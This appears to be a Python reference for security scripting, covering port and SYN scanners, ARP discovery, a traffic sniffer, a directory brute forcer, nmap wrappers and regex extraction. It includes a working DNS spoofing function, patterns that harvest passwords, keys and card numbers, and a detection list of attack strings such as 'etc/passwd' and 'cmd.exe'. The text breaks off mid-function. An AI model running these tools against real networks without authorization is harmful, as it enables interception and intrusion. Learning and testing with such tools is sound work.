Python Reference for Security Scripts

A practical reference for writing security tools and automation scripts in Python. Each section covers a key library or technique with annotated code snippets ready for adaptation.


Table of Contents

  1. Environment Setup
  2. Socket Programming
  3. HTTP Requests (requests / urllib)
  4. Scapy — Packet Crafting and Sniffing
  5. Subprocess — Running System Commands
  6. Argparse — CLI Argument Parsing
  7. File I/O for Security Scripts
  8. Regular Expressions (re)
  9. JSON and XML Parsing
  10. Cryptography Library
  11. Paramiko — SSH Automation
  12. Impacket Basics
  13. Multithreading and Concurrency
  14. Error Handling Patterns
  15. Output Formatting and Logging
  16. Common Security Script Patterns

1. Environment Setup

Virtual Environment

Always use virtual environments to isolate dependencies:

# Create and activate a virtual environment
python3 -m venv pentest-env
source pentest-env/bin/activate   # Linux/macOS
pentest-env\Scripts\activate      # Windows

# Install common security libraries
pip install requests scapy paramiko impacket pycryptodome python-nmap
pip install beautifulsoup4 lxml colorama tabulate

Shebang and Encoding

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Script description and usage information.
Author: Your Name
Date: 2025-01-01
"""

Import Organization

# Standard library
import os
import sys
import socket
import struct
import time
import json
import re
import argparse
import logging
import threading
from datetime import datetime

# Third-party
import requests
from scapy.all import *
import paramiko

# Local modules
from utils import format_output

2. Socket Programming

TCP Client

import socket

def tcp_client(target_host, target_port, message=""):
    """Connect over TCP, optionally send a message, and return the first reply.

    Args:
        target_host: Hostname or IP address to connect to.
        target_port: TCP port number.
        message: Text to send after connecting. An empty string sends
            nothing, which makes this a plain banner grab.

    Returns:
        Up to 4096 bytes of the reply decoded as text (undecodable bytes are
        replaced), or a "[*] ..." status string on timeout or refusal.
        Other socket errors propagate to the caller.
    """
    # The context manager closes the socket on every exit path.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
        client.settimeout(5)
        try:
            client.connect((target_host, target_port))
            if message:
                # sendall() keeps writing until the whole payload is sent;
                # send() is allowed to transmit only part of it.
                client.sendall(message.encode())
            response = client.recv(4096)
        except socket.timeout:
            return "[*] Connection timed out"
        except ConnectionRefusedError:
            return "[*] Connection refused"
    return response.decode(errors="replace")

# Usage: banner grab — connect to port 22, send nothing, and print whatever
# tcp_client returns (the service's first reply or a "[*] ..." status string).
banner = tcp_client("192.168.1.10", 22)
print(f"Banner: {banner}")

TCP Server (Listener)

import socket
import threading

def handle_client(client_socket, addr):
    """Serve one accepted connection: log the peer, echo its data, reply ACK.

    Args:
        client_socket: Connected socket returned by ``accept()``.
        addr: Peer address; index 0 is the host and index 1 the port.
    """
    peer_host, peer_port = addr[0], addr[1]
    print(f"[*] Connection from {peer_host}:{peer_port}")
    try:
        received = client_socket.recv(4096)
        text = received.decode(errors='replace')
        print(f"[*] Received: {text}")
        client_socket.send(b"ACK\n")
    finally:
        # Release the connection even when recv/send raised.
        client_socket.close()

def tcp_server(bind_ip="0.0.0.0", bind_port=9999):
    """Listen for TCP connections and hand each one to ``handle_client``.

    Runs until an exception (for example KeyboardInterrupt) ends the accept
    loop; the listening socket is closed on the way out.

    Args:
        bind_ip: Local address to bind to ("0.0.0.0" means all interfaces).
        bind_port: Local TCP port to listen on.
    """
    # The context manager guarantees the listening socket is released when
    # the loop is interrupted or bind/listen fails.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        # Allow immediate re-binding after a restart.
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((bind_ip, bind_port))
        server.listen(5)
        print(f"[*] Listening on {bind_ip}:{bind_port}")

        while True:
            client, addr = server.accept()
            # One thread per connection so a slow client cannot block accept().
            handler = threading.Thread(target=handle_client, args=(client, addr))
            handler.start()

UDP Client

import socket

def udp_client(target_host, target_port, message):
    """Send one UDP datagram and wait up to 3 seconds for a reply.

    Returns:
        The reply decoded as text (undecodable bytes replaced), or
        "[*] No response (UDP)" if nothing arrives before the timeout.
    """
    destination = (target_host, target_port)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(3)

    try:
        sock.sendto(message.encode(), destination)
        payload, _sender = sock.recvfrom(4096)
    except socket.timeout:
        return "[*] No response (UDP)"
    else:
        return payload.decode(errors="replace")
    finally:
        sock.close()

Port Scanner

import socket
import threading
from queue import Queue

def port_scan(target, port):
    """Probe one TCP port with a full connect and try to read a banner.

    Args:
        target: Hostname or IP address to probe.
        port: TCP port number.

    Returns:
        A ``(port, is_open, banner)`` tuple. ``banner`` is "" when the port
        is closed or the service sends nothing within the 1-second timeout.
    """
    try:
        # Creating the socket inside ``with`` means a failed creation cannot
        # leave an unbound name for cleanup, and the socket is always closed.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(1)
            if sock.connect_ex((target, port)) != 0:
                return (port, False, "")
            try:
                banner = sock.recv(1024).decode(errors="replace").strip()
            except OSError:
                # Timeout or reset while reading the banner: the connect
                # already succeeded, so the port is still reported open.
                banner = ""
            return (port, True, banner)
    except Exception:
        # Best-effort scanner: resolution failures, invalid ports, etc.
        # are reported as "closed" rather than aborting the whole scan.
        return (port, False, "")

def threaded_scan(target, ports, max_threads=100):
    """Scan many ports concurrently with a pool of worker threads.

    Args:
        target: Hostname or IP address to scan.
        ports: Any iterable of port numbers (list, range, generator, ...).
        max_threads: Upper bound on worker threads; values below 1 are
            treated as 1.

    Returns:
        The ``(port, True, banner)`` tuples produced by ``port_scan`` for
        every open port, sorted by port number.
    """
    from queue import Empty  # local import: the snippet only imports Queue

    ports = list(ports)  # materialize so iterators work and len() is valid
    results = []
    lock = threading.Lock()
    pending = Queue()

    for port in ports:
        pending.put(port)

    def worker():
        while True:
            # get_nowait() avoids the empty()/get() race in which another
            # worker drains the queue between the check and the blocking get.
            try:
                port = pending.get_nowait()
            except Empty:
                return
            try:
                result = port_scan(target, port)
                if result[1]:  # port is open
                    with lock:
                        results.append(result)
            finally:
                # Always mark the item done so pending.join() cannot hang.
                pending.task_done()

    worker_count = min(max(1, max_threads), len(ports))
    for _ in range(worker_count):
        t = threading.Thread(target=worker)
        t.daemon = True
        t.start()

    pending.join()
    return sorted(results, key=lambda x: x[0])

# Usage: scan ports 1-1024. threaded_scan returns only open ports, as
# (port, is_open, banner) tuples sorted by port number.
open_ports = threaded_scan("192.168.1.10", range(1, 1025))
for port, is_open, banner in open_ports:
    print(f"  Port {port:>5}/tcp  OPEN  {banner}")

Raw Sockets (Linux only)

import socket
import struct

def raw_sniffer(interface="eth0", count=10):
    """Capture and print raw Ethernet frames (Linux only, requires root).

    Args:
        interface: Name of the network interface to capture on.
        count: Number of frames to read before returning.

    Raises:
        OSError: If the raw socket cannot be created or bound (for example
            missing privileges or an unknown interface name).
    """
    # Protocol 3 is ETH_P_ALL: receive every Ethernet protocol.
    raw_sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
    try:
        # Without bind() the socket receives frames from every interface and
        # the ``interface`` argument would be silently ignored.
        raw_sock.bind((interface, 0))

        for i in range(count):
            raw_data, addr = raw_sock.recvfrom(65535)

            # An Ethernet header is 14 bytes; skip anything shorter.
            if len(raw_data) < 14:
                continue

            # Parse Ethernet header: dst MAC, src MAC, EtherType
            eth_header = struct.unpack("!6s6sH", raw_data[:14])
            dst_mac = ":".join(f"{b:02x}" for b in eth_header[0])
            src_mac = ":".join(f"{b:02x}" for b in eth_header[1])
            eth_type = eth_header[2]

            print(f"[{i+1}] {src_mac} -> {dst_mac} (Type: 0x{eth_type:04x})")

            # If IPv4 (0x0800) and the fixed 20-byte IP header is present
            if eth_type == 0x0800 and len(raw_data) >= 34:
                ip_header = struct.unpack("!BBHHHBBH4s4s", raw_data[14:34])
                src_ip = socket.inet_ntoa(ip_header[8])
                dst_ip = socket.inet_ntoa(ip_header[9])
                protocol = ip_header[6]
                print(f"     IP: {src_ip} -> {dst_ip} (Proto: {protocol})")
    finally:
        raw_sock.close()

3. HTTP Requests

Basic GET/POST with requests

import requests
from requests.exceptions import RequestException

def web_request(url, method="GET", data=None, headers=None,
                cookies=None, proxy=None, verify=True, timeout=10):
    """Send an HTTP request with a browser-like User-Agent.

    Args:
        url: Target URL.
        method: HTTP verb, case-insensitive (GET, POST, PUT, HEAD, ...).
        data: Request body; ignored for GET.
        headers: Extra headers merged over the default User-Agent.
        cookies: Cookies to send.
        proxy: Proxy URL used for both http and https, or None.
        verify: Whether to verify TLS certificates.
        timeout: Timeout in seconds.

    Returns:
        The ``requests.Response``, or None if the request raised a
        ``RequestException`` (the error is printed).
    """
    proxies = {"http": proxy, "https": proxy} if proxy else None
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
                      "AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/120.0.0.0 Safari/537.36"
    }
    if headers:
        request_headers.update(headers)

    verb = method.upper()
    options = {
        "headers": request_headers,
        "cookies": cookies,
        "proxies": proxies,
        "verify": verify,
        "timeout": timeout,
    }
    if verb != "GET":
        options["data"] = data

    try:
        # requests.request handles every verb, so an unexpected method no
        # longer falls through both branches and leaves the response unbound.
        return requests.request(verb, url, **options)
    except RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

# Usage
resp = web_request("https://example.com")
if resp is not None:  # web_request returns None when the request failed
    print(f"Status: {resp.status_code}")
    print(f"Headers: {dict(resp.headers)}")
    print(f"Body length: {len(resp.text)}")

Session Handling

import requests

def authenticated_session(login_url, username, password, timeout=10):
    """Log in with a form POST and return the authenticated session.

    Success is judged heuristically: HTTP 200 and the word "logout"
    somewhere in the response body.

    Args:
        login_url: URL that accepts the login form.
        username: Value for the "username" form field.
        password: Value for the "password" form field.
        timeout: Seconds to wait for the login request.

    Returns:
        The ``requests.Session`` on success, otherwise None.
    """
    session = requests.Session()

    # Authenticate
    login_data = {"username": username, "password": password}
    try:
        resp = session.post(login_url, data=login_data, timeout=timeout)
    except requests.RequestException as exc:
        print(f"[-] Authentication failed: {exc}")
        session.close()
        return None

    if resp.status_code == 200 and "logout" in resp.text.lower():
        print("[+] Authentication successful")
        return session

    print("[-] Authentication failed")
    session.close()  # do not leak the connection pool on failure
    return None

# Usage
# authenticated_session returns None on failure, so check before using it.
session = authenticated_session(
    "http://target.com/login",
    "admin",
    "password123"
)
if session:
    # Authenticated requests: reuse the same Session object for later calls
    dashboard = session.get("http://target.com/dashboard")

Directory Brute Forcer

import requests
from concurrent.futures import ThreadPoolExecutor

def dir_brute(target_url, wordlist_path, extensions=None, threads=20):
    """Probe a web server for paths taken from a wordlist.

    Args:
        target_url: Base URL; a trailing slash is ignored.
        wordlist_path: File with one candidate path per line.
        extensions: Suffixes appended to every word (default: none).
        threads: Size of the worker thread pool.

    Returns:
        A list of ``(status_code, url, size)`` tuples for every response
        whose status is neither 404 nor 403.
    """
    suffixes = extensions if extensions else [""]
    hits = []

    with open(wordlist_path, "r") as wordlist:
        stripped = (raw.strip() for raw in wordlist)
        candidates = [entry for entry in stripped if entry]

    def probe(word):
        for suffix in suffixes:
            name = word if not suffix else f"{word}{suffix}"
            url = f"{target_url.rstrip('/')}/{name}"
            try:
                resp = requests.get(url, timeout=5, allow_redirects=False)
                if resp.status_code in [404, 403]:
                    continue
                result = f"[{resp.status_code}] {url} (Size: {len(resp.content)})"
                print(result)
                hits.append((resp.status_code, url, len(resp.content)))
            except requests.RequestException:
                # Unreachable or broken responses are simply skipped.
                continue

    # Leaving the with-block waits for every submitted probe to finish.
    with ThreadPoolExecutor(max_workers=threads) as pool:
        pool.map(probe, candidates)

    return hits

Handling Proxies (Burp Suite Integration)

import requests
import urllib3

# Suppress InsecureRequestWarning when using Burp
# (verify=False below would otherwise emit a warning on every request)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Both schemes point at the same local listener on 127.0.0.1:8080.
BURP_PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

# All traffic routes through Burp Suite
# NOTE(review): no timeout is passed, so this call can block indefinitely.
resp = requests.get(
    "https://target.com/api/users",
    proxies=BURP_PROXY,
    verify=False  # Required for Burp's self-signed cert
)

4. Scapy — Packet Crafting and Sniffing

Basic Packet Construction

from scapy.all import *

# Build an ICMP echo request (ping)
# sr1() sends the packet and returns the first answer, or None on timeout.
packet = IP(dst="192.168.1.1") / ICMP()
response = sr1(packet, timeout=2, verbose=0)
if response:
    print(f"[+] {response.src} is alive (TTL: {response.ttl})")

# Build a TCP SYN packet
syn_packet = IP(dst="192.168.1.10") / TCP(dport=80, flags="S")
response = sr1(syn_packet, timeout=2, verbose=0)
if response and response.haslayer(TCP):
    # TCP flag bits: SYN=0x02, RST=0x04, ACK=0x10
    if response[TCP].flags == 0x12:  # SYN-ACK
        print("[+] Port 80 is OPEN")
    elif response[TCP].flags == 0x14:  # RST-ACK
        print("[-] Port 80 is CLOSED")

SYN Scanner

from scapy.all import *

def syn_scan(target, ports):
    """Perform a half-open (SYN) scan using Scapy (requires root).

    Args:
        target: Hostname or IP address to scan.
        ports: Iterable of TCP port numbers.

    Returns:
        List of ports that answered the SYN with SYN-ACK.
    """
    open_ports = []

    for port in ports:
        pkt = IP(dst=target) / TCP(dport=port, flags="S")
        resp = sr1(pkt, timeout=1, verbose=0)

        if resp is None or not resp.haslayer(TCP):
            continue

        if resp[TCP].flags == 0x12:  # SYN-ACK
            open_ports.append(port)
            # Tear down the half-open connection. The RST must come from the
            # port the SYN-ACK was addressed to and carry the sequence number
            # the target acknowledged, otherwise the target discards it.
            rst = IP(dst=target) / TCP(
                sport=resp[TCP].dport,
                dport=port,
                flags="R",
                seq=resp[TCP].ack,
            )
            send(rst, verbose=0)

    return open_ports

# Usage: probe a handful of common service ports and print the open ones.
results = syn_scan("192.168.1.10", [21, 22, 80, 443, 445, 3389])
print(f"Open ports: {results}")

ARP Scanner (Network Discovery)

from scapy.all import *

def arp_scan(network):
    """Find live hosts by broadcasting ARP requests for ``network``.

    Args:
        network: Address or CIDR range placed in the ARP request's ``pdst``.

    Returns:
        One ``{"ip": ..., "mac": ...}`` dict per host that answered
        within 2 seconds.
    """
    # Ethernet broadcast frame wrapping the ARP who-has request.
    probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=network)

    replies, _unanswered = srp(probe, timeout=2, verbose=0)

    return [
        {"ip": reply.psrc, "mac": reply.hwsrc}
        for _request, reply in replies
    ]

# Usage: sweep a /24 and print each responder's IP (right-aligned) and MAC.
hosts = arp_scan("192.168.1.0/24")
for host in hosts:
    print(f"  {host['ip']:>15}  {host['mac']}")

Packet Sniffer

from scapy.all import *
from datetime import datetime

def packet_callback(packet):
    """Print a one-line summary of each captured TCP or UDP packet.

    Handles both IPv4 and IPv6; packets with no IP layer are ignored.
    For TCP packets carrying a payload that looks like HTTP, the first
    100 characters of the payload are printed as well.
    """
    # A capture filter such as "tcp port 80" also matches IPv6 traffic,
    # where indexing packet[IP] would raise.
    if packet.haslayer(IP):
        net = packet[IP]
    elif packet.haslayer(IPv6):
        net = packet[IPv6]
    else:
        return

    timestamp = datetime.now().strftime("%H:%M:%S")

    if packet.haslayer(TCP):
        src = f"{net.src}:{packet[TCP].sport}"
        dst = f"{net.dst}:{packet[TCP].dport}"
        flags = packet[TCP].flags
        print(f"[{timestamp}] TCP {src} -> {dst} [{flags}]")

        # Check for HTTP data
        if packet.haslayer(Raw):
            payload = packet[Raw].load.decode(errors="replace")
            if "HTTP" in payload or "GET" in payload or "POST" in payload:
                print(f"           HTTP: {payload[:100]}")

    elif packet.haslayer(UDP):
        src = f"{net.src}:{packet[UDP].sport}"
        dst = f"{net.dst}:{packet[UDP].dport}"
        print(f"[{timestamp}] UDP {src} -> {dst}")

# Usage: sniff HTTP traffic
# ``filter`` is a BPF capture filter; ``count=50`` stops after 50 packets.
sniff(filter="tcp port 80", prn=packet_callback, count=50)

DNS Spoofing Example

from scapy.all import *

def dns_spoof(packet):
    """Answer an observed IPv4 DNS query with a spoofed A record.

    For authorized testing in a lab or an engagement with written
    permission only.

    Only genuine queries (DNS ``qr`` flag 0) are answered. Responses,
    including the ones this function sends itself, also contain a question
    section; reacting to them would create a reply loop.
    """
    if not (packet.haslayer(IP) and packet.haslayer(UDP)
            and packet.haslayer(DNS) and packet.haslayer(DNSQR)):
        return
    if packet[DNS].qr != 0:  # 1 means "response": never answer those
        return

    queried_domain = packet[DNSQR].qname.decode()
    spoofed_ip = "192.168.1.100"  # Attacker's IP

    # Mirror addresses, ports and transaction id so the client accepts the
    # reply as the answer to its own query.
    spoofed_pkt = (
        IP(dst=packet[IP].src, src=packet[IP].dst) /
        UDP(dport=packet[UDP].sport, sport=53) /
        DNS(
            id=packet[DNS].id,
            qr=1, aa=1, qd=packet[DNS].qd,
            an=DNSRR(rrname=queried_domain, ttl=300, rdata=spoofed_ip)
        )
    )
    send(spoofed_pkt, verbose=0)
    print(f"[*] Spoofed {queried_domain} -> {spoofed_ip}")

# Usage (requires ARP spoofing or network position)
# No ``count`` is given, so sniff() keeps running until it is interrupted.
sniff(filter="udp port 53", prn=dns_spoof)

5. Subprocess — Running System Commands

Safe Command Execution

import subprocess
import shlex

def run_command(command, timeout=30):
    """Run a command without a shell and collect its output.

    Args:
        command: Command line as a single string; it is tokenized with
            ``shlex.split`` and never passed to a shell.
        timeout: Seconds to wait before giving up.

    Returns:
        A dict with "stdout", "stderr" and "returncode". Timeouts and a
        missing executable are reported with returncode -1 and an
        explanatory "stderr" message.
    """
    try:
        argv = shlex.split(command)
        completed = subprocess.run(
            argv, capture_output=True, text=True, timeout=timeout
        )
    except subprocess.TimeoutExpired:
        return dict(stdout="", stderr="Command timed out", returncode=-1)
    except FileNotFoundError:
        return dict(stdout="", stderr="Command not found", returncode=-1)
    else:
        return dict(
            stdout=completed.stdout,
            stderr=completed.stderr,
            returncode=completed.returncode,
        )

# Usage: run_command always returns a dict, so "stdout" is safe to read
# even when the command timed out or was not found (it is "" then).
result = run_command("nmap -sV -p 80,443 192.168.1.10")
print(result["stdout"])

Running Nmap from Python

import subprocess
import xml.etree.ElementTree as ET

def nmap_scan(target, arguments="-sV -sC"):
    """Run Nmap with XML output on stdout and parse hosts and ports.

    Args:
        target: Target specification passed to nmap.
        arguments: Extra nmap command-line options.

    Returns:
        A list of ``{"ip": ..., "ports": [...]}`` dicts, or None when nmap
        is missing, times out, exits non-zero, or emits unparsable XML
        (the reason is printed).
    """
    import shlex  # local import: this snippet's import list omits shlex

    cmd = f"nmap {arguments} -oX - {target}"
    try:
        result = subprocess.run(
            shlex.split(cmd),
            capture_output=True, text=True, timeout=300
        )
    except FileNotFoundError:
        print("[!] Nmap error: nmap executable not found")
        return None
    except subprocess.TimeoutExpired:
        print("[!] Nmap error: scan timed out")
        return None

    if result.returncode != 0:
        print(f"[!] Nmap error: {result.stderr}")
        return None

    # Parse XML output
    try:
        root = ET.fromstring(result.stdout)
    except ET.ParseError as exc:
        print(f"[!] Nmap error: could not parse XML output: {exc}")
        return None

    hosts = []
    for host in root.findall("host"):
        address = host.find("address")
        if address is None:
            continue
        ports = []
        for port in host.findall(".//port"):
            # <state> and <service> are looked up defensively: a <port>
            # element without <service> must not abort the whole parse.
            state = port.find("state")
            service = port.find("service")
            ports.append({
                "port": port.get("portid"),
                "protocol": port.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "service": (service.get("name", "unknown")
                            if service is not None else "unknown"),
                "version": (service.get("product", "")
                            if service is not None else ""),
            })
        hosts.append({"ip": address.get("addr"), "ports": ports})

    return hosts

Piping Between Commands

import subprocess

def pipe_commands(cmd1, cmd2):
    """Run ``cmd1 | cmd2`` without a shell and return cmd2's stdout as text.

    Args:
        cmd1: Producer command line (tokenized with ``shlex.split``).
        cmd2: Consumer command line (tokenized with ``shlex.split``).
    """
    import shlex  # local import: this snippet's import list omits shlex

    p1 = subprocess.Popen(
        shlex.split(cmd1),
        stdout=subprocess.PIPE
    )
    p2 = subprocess.Popen(
        shlex.split(cmd2),
        stdin=p1.stdout,
        stdout=subprocess.PIPE,
        text=True
    )
    # Close our copy of the pipe so p1 receives SIGPIPE if p2 exits early.
    p1.stdout.close()
    output, _ = p2.communicate()
    p1.wait()  # reap the producer so it does not linger as a zombie
    return output

# Example: grep specific lines from nmap output
# Each command string is tokenized with shlex.split, so the quoted 'open'
# reaches grep as a single argument without the quotes.
result = pipe_commands(
    "nmap -sV 192.168.1.0/24",
    "grep 'open'"
)

6. Argparse — CLI Argument Parsing

Professional CLI Tool Template

#!/usr/bin/env python3
"""
Security Tool Template
Usage: python3 tool.py -t TARGET -p PORTS [options]
"""
import argparse
import sys

def parse_args():
    """Define the scanner's command-line options and parse ``sys.argv``.

    Returns:
        The ``argparse.Namespace`` with target, ports, output, format,
        threads, timeout, verbose and quiet.
    """
    usage_examples = (
        "\n"
        "Examples:\n"
        "  %(prog)s -t 192.168.1.10 -p 1-1024\n"
        "  %(prog)s -t 10.0.0.0/24 -p 80,443,8080 --threads 50\n"
        "  %(prog)s -t targets.txt -p top100 -o results.json\n"
        "        "
    )
    cli = argparse.ArgumentParser(
        description="Network Security Scanner",
        # Raw formatter keeps the line breaks of the examples above.
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=usage_examples,
    )
    option = cli.add_argument

    # Mandatory: what to scan and which ports.
    option("-t", "--target", required=True,
           help="Target IP, range, CIDR, or file")
    option("-p", "--ports", required=True,
           help="Port(s): single, range (1-1024), "
                "comma-separated, or 'top100'")

    # Tuning and output control.
    option("-o", "--output", help="Output file path")
    option("-f", "--format", choices=["text", "json", "csv"],
           default="text", help="Output format (default: text)")
    option("--threads", type=int, default=10,
           help="Number of threads (default: 10)")
    option("--timeout", type=float, default=2.0,
           help="Connection timeout in seconds (default: 2.0)")
    option("-v", "--verbose", action="count", default=0,
           help="Increase verbosity (-v, -vv, -vvv)")
    option("-q", "--quiet", action="store_true",
           help="Suppress banner and status messages")

    return cli.parse_args()

def parse_ports(port_string):
    """Parse a port specification into a sorted list of unique integers.

    Accepts comma-separated items, each a single port ("80"), an inclusive
    range ("1-1024"), or the keyword "top100" (case-insensitive).
    Whitespace around items and empty items are ignored.

    Raises:
        ValueError: If an item is not numeric, a range is reversed, or a
            port lies outside 0-65535.
    """
    # NOTE: despite the keyword's name this is an abbreviated list of
    # 20 frequently used ports.
    common_ports = [21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443,
                    445, 993, 995, 1723, 3306, 3389, 5900, 8080]

    def checked(text):
        value = int(text)
        if not 0 <= value <= 65535:
            raise ValueError(f"Port out of range (0-65535): {value}")
        return value

    ports = set()
    for part in port_string.split(","):
        part = part.strip()
        if not part:
            continue  # tolerate "80,,443" and trailing commas
        if part.lower() == "top100":
            ports.update(common_ports)
        elif "-" in part:
            start_text, end_text = part.split("-", 1)
            # Validate both bounds before building the range so a typo such
            # as "1-99999999" fails fast instead of allocating a huge set.
            start, end = checked(start_text), checked(end_text)
            if start > end:
                raise ValueError(f"Invalid port range: {part!r}")
            ports.update(range(start, end + 1))
        else:
            ports.add(checked(part))
    return sorted(ports)

# Entry point: runs only when the file is executed as a script, not on import.
if __name__ == "__main__":
    args = parse_args()
    # Expand the textual port specification into a sorted list of ints.
    ports = parse_ports(args.ports)
    # ... rest of the tool logic

7. File I/O for Security Scripts

Reading Wordlists and Target Files

def load_wordlist(filepath):
    """Read a wordlist, dropping blank lines and ``#`` comment lines.

    The file is read as UTF-8; undecodable bytes are replaced rather than
    raising. Each entry is returned with surrounding whitespace removed.
    """
    with open(filepath, "r", encoding="utf-8", errors="replace") as handle:
        stripped = (raw.strip() for raw in handle)
        return [
            entry for entry in stripped
            if entry and not entry.startswith("#")
        ]

def load_targets(filepath):
    """Read scan targets from a file, one per line.

    Blank lines and ``#`` comments are skipped. A line that parses as an IP
    network (CIDR or single address) is expanded to its host addresses;
    anything else is kept verbatim as a hostname.
    """
    import ipaddress

    collected = []
    with open(filepath, "r") as handle:
        for raw in handle:
            entry = raw.strip()
            if entry and not entry.startswith("#"):
                try:
                    # strict=False accepts host bits, e.g. "10.0.0.5/24".
                    net = ipaddress.ip_network(entry, strict=False)
                except ValueError:
                    # Not an address or network: treat as a hostname.
                    collected.append(entry)
                else:
                    for host_ip in net.hosts():
                        collected.append(str(host_ip))
    return collected

Writing Structured Output

import json
import csv
from datetime import datetime

def write_results(results, output_path, fmt="json"):
    """Write scan results to ``output_path`` as JSON, CSV or plain text.

    Args:
        results: List of result records (dicts are required for CSV).
        output_path: Destination file path.
        fmt: "json", "csv" or "text".

    Raises:
        ValueError: If ``fmt`` is not one of the supported formats.

    With ``fmt="csv"`` and no results, nothing is written.
    """
    if fmt not in ("json", "csv", "text"):
        # Previously an unknown format wrote nothing yet reported success.
        raise ValueError(f"Unsupported output format: {fmt!r}")

    if fmt == "json":
        with open(output_path, "w") as f:
            json.dump({
                "scan_date": datetime.now().isoformat(),
                "results": results
            }, f, indent=2)

    elif fmt == "csv":
        if not results:
            return
        # Header is the union of all keys in first-seen order, so rows with
        # extra keys do not make DictWriter raise; missing values become "".
        fieldnames = list(dict.fromkeys(key for row in results for key in row))
        with open(output_path, "w", newline="") as f:
            writer = csv.DictWriter(f, fieldnames=fieldnames)
            writer.writeheader()
            writer.writerows(results)

    else:  # "text"
        with open(output_path, "w") as f:
            for r in results:
                f.write(f"{r}\n")

    print(f"[+] Results written to {output_path}")

Binary File Handling

def read_binary_file(filepath):
    """Return the entire contents of ``filepath`` as a bytes object."""
    with open(filepath, mode="rb") as handle:
        contents = handle.read()
    return contents

def hexdump(data, length=16):
    """Render bytes as a classic hex dump, ``length`` bytes per row.

    Each row shows the 8-digit hex offset, the bytes in hex (padded to a
    fixed column width) and a printable-ASCII column where non-printable
    bytes appear as ".".
    """
    hex_width = length * 3

    def render(offset):
        row = data[offset:offset + length]
        hex_part = " ".join(f"{byte:02x}" for byte in row)
        text_part = "".join(
            chr(byte) if 32 <= byte < 127 else "." for byte in row
        )
        return f"{offset:08x}  {hex_part.ljust(hex_width)}  |{text_part}|"

    return "\n".join(render(start) for start in range(0, len(data), length))

# Usage: dump the first 256 bytes of a file (16 rows at the default width).
data = read_binary_file("/path/to/binary")
print(hexdump(data[:256]))

8. Regular Expressions (re)

Common Security Patterns

import re

# IP Address extraction (dotted-quad IPv4, each octet limited to 0-255)
IP_PATTERN = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|[01]?\d\d?)\b'
)

# Email extraction
EMAIL_PATTERN = re.compile(
    r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
)

# URL extraction (http/https URLs, or bare "www." hosts)
URL_PATTERN = re.compile(
    r'https?://[^\s<>"\']+|www\.[^\s<>"\']+'
)

# Hash detection: hex strings of exactly 32 / 40 / 64 characters.
# The \b anchors keep a longer digest from also matching as a shorter one.
MD5_PATTERN = re.compile(r'\b[a-fA-F0-9]{32}\b')
SHA1_PATTERN = re.compile(r'\b[a-fA-F0-9]{40}\b')
SHA256_PATTERN = re.compile(r'\b[a-fA-F0-9]{64}\b')

# Password pattern in source code: keyword, "=" or ":", then a quoted value.
# The single capture group is the quoted value.
PASSWORD_PATTERNS = re.compile(
    r'(?:password|passwd|pwd|secret|api_key|apikey|token|auth)'
    r'\s*[=:]\s*["\']([^"\']+)["\']',
    re.IGNORECASE
)

# Credit card patterns: 13-16 digits, optionally separated by spaces/dashes.
# Purely syntactic; no checksum validation is performed.
CC_PATTERN = re.compile(
    r'\b(?:\d[ -]*?){13,16}\b'
)

# Base64-encoded strings (20+ alphabet characters, optional padding)
BASE64_PATTERN = re.compile(
    r'[A-Za-z0-9+/]{20,}={0,2}'
)

def extract_all(text):
    """Extract all interesting artifacts from text.

    Returns:
        A dict mapping each category name to the list of matches found by
        the corresponding module-level pattern. "passwords" holds the
        captured secret values only; "credit_cards" holds candidate card
        numbers exactly as written in the text.
    """
    return {
        "ips": IP_PATTERN.findall(text),
        "emails": EMAIL_PATTERN.findall(text),
        "urls": URL_PATTERN.findall(text),
        "md5_hashes": MD5_PATTERN.findall(text),
        "sha1_hashes": SHA1_PATTERN.findall(text),
        "sha256_hashes": SHA256_PATTERN.findall(text),
        "passwords": PASSWORD_PATTERNS.findall(text),
        # CC_PATTERN was defined above but never applied.
        "credit_cards": CC_PATTERN.findall(text),
        "base64_strings": BASE64_PATTERN.findall(text),
    }

# Usage: scan a log file and show, per category with at least one match,
# the match count and the first five matches.
with open("logfile.txt") as f:
    artifacts = extract_all(f.read())
    for category, items in artifacts.items():
        if items:
            print(f"\n{category}: {len(items)} found")
            for item in items[:5]:
                print(f"  {item}")

Log File Parsing

import re
from collections import Counter

# Apache access log pattern (common log format prefix):
#   ip ident user [timestamp] "method path protocol" status size
# Every captured field is a named group; the timestamp group had lost its
# name, which made the pattern fail to compile.
APACHE_LOG = re.compile(
    r'(?P<ip>\S+) \S+ \S+ '
    r'\[(?P<timestamp>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) (?P<size>\S+)'
)

def parse_access_log(filepath):
    """Parse an Apache/Nginx access log and flag suspicious activity.

    Lines that do not match ``APACHE_LOG`` are skipped.

    Returns:
        A dict with:
          "top_ips": the 20 most frequent client IPs as (ip, count) pairs,
          "suspicious_requests": (ip, path, status) for request paths that
              contain an injection/traversal keyword,
          "failed_logins": (ip, path) for 401/403 responses on paths
              containing "login".
    """
    ip_counter = Counter()
    failed_logins = []
    suspicious_paths = []

    suspicious_keywords = [
        "union", "select", "../../", "etc/passwd",
        "<script", "cmd.exe", "eval(", "system("
    ]

    # Attack traffic routinely contains bytes that are not valid UTF-8;
    # replace them instead of aborting the whole parse.
